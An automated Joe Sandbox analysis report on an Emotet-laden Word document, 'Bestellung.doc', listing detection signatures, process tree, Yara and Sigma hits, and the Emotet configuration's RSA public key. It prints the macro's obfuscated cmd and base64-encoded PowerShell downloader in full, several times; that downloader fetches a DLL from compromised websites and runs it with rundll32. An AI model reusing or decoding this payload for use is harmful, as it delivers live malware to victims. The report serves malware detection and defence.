Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Bestellung.doc

Overview

General Information

Sample Name:Bestellung.doc
Analysis ID:344273
MD5:268e0826d78c069d3834a8203a44af4f
SHA1:5f14c1a62195af4f3018b57d097876fb41da7937
SHA256:f9f3c11c9f92d92d74eb40958a14d97f0f36497b6c86109b237628815642102a

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2436 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2608 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2572 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2396 cmdline: powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 1204 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2896 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2952 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 3028 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2340471490.0000000000400000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000009.00000002.2103211054.00000000001D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000008.00000002.2099681176.00000000001D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000009.00000002.2103277620.0000000000230000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000007.00000002.2099018804.0000000000890000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.rundll32.exe.400000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              7.2.rundll32.exe.230000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                9.2.rundll32.exe.1d0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  8.2.rundll32.exe.250000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    9.2.rundll32.exe.230000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 11 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2896, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1, ProcessId: 2952
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwB